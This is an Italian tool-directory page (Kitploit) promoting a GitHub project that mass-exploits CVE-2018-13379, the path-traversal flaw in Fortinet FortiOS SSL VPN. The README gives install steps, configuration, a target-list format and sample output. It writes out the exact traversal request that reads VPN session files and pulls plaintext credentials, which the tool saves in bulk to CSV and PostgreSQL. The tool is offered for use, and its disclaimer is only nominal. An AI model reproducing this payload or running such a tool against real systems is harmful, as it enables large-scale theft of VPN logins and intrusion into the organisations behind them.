Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 mass exploiter per Fortinet FortiOS SSL VPN. Estrae le credenziali istantaneamente, salva in CSV + PostgreSQL. Multi-thread, nessun avviso inutile. | Kitploit
Strumenti/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

CVE-2018-13379 mass exploiter per Fortinet FortiOS SSL VPN. Estrae le credenziali istantaneamente, salva in CSV + PostgreSQL. Multi-thread, nessun avviso inutile.

Vedi Repository
1154 mesi faNon ancora revisionato

preview

CVE-2018-13379 — Exploit di massa per Fortinet FortiOS SSL VPN

Uno strumento per lo sfruttamento di massa della vulnerabilità CVE-2018-13379 (path traversal) in Fortinet FortiOS SSL VPN. Consente di leggere i file di sessione ed estrarre login e password in chiaro.

Caratteristiche

  • Sfruttamento di CVE-2018-13379 tramite l'endpoint /remote/fgt_lang
  • Multithreading (20 thread di default)
  • Salvataggio immediato delle credenziali trovate in CSV e PostgreSQL
  • Nomi di tabella dinamici in PostgreSQL con timestamp (fortios_creds_20250120_143052)
  • Nessun avviso - solo risultati

Installazione

git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

Configurazione

Tutte le impostazioni sono modificabili direttamente nello script - niente da armeggiare con gli argomenti della riga di comando:

TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (opzionale - lo script funziona anche senza database)

PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

Utilizzo

  1. Crea un file targets.txt con i target, uno per riga:
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. Esegui lo script:
python3 exploit.py

Risultati

  • File CSV — tutte le credenziali trovate con timestamp
  • Tabella PostgreSQL — una nuova tabella viene creata a ogni esecuzione (fortios_creds_YYYYMMDD_HHMMSS)

Esempio di output:

[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

Come funziona

  1. Viene inviata una richiesta GET all'indirizzo https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession
  2. La risposta viene controllata per verificare se contiene la stringa var fgt_lang (un segno di vulnerabilità)
  3. Le coppie username e password vengono estratte dalla risposta binaria
  4. I dati trovati vengono immediatamente salvati in CSV e PostgreSQL
  5. Lo script passa al target successivo.

Requisiti

  • Python 3.6+
  • requests
  • psycopg2-binary (opzionale - senza funzionano solo i file CSV)
  • urllib3

Avvertenza

Questo strumento è destinato a scopi educativi e a test autorizzati. Sei responsabile delle tue azioni.

Riconoscimenti

  • Vulnerabilità originale scoperta da Meh Chang
  • La logica di sfruttamento si basa su ricerche pubblicamente disponibili

Licenza

Unlicense - fai quello che vuoi.

Scarica lo strumento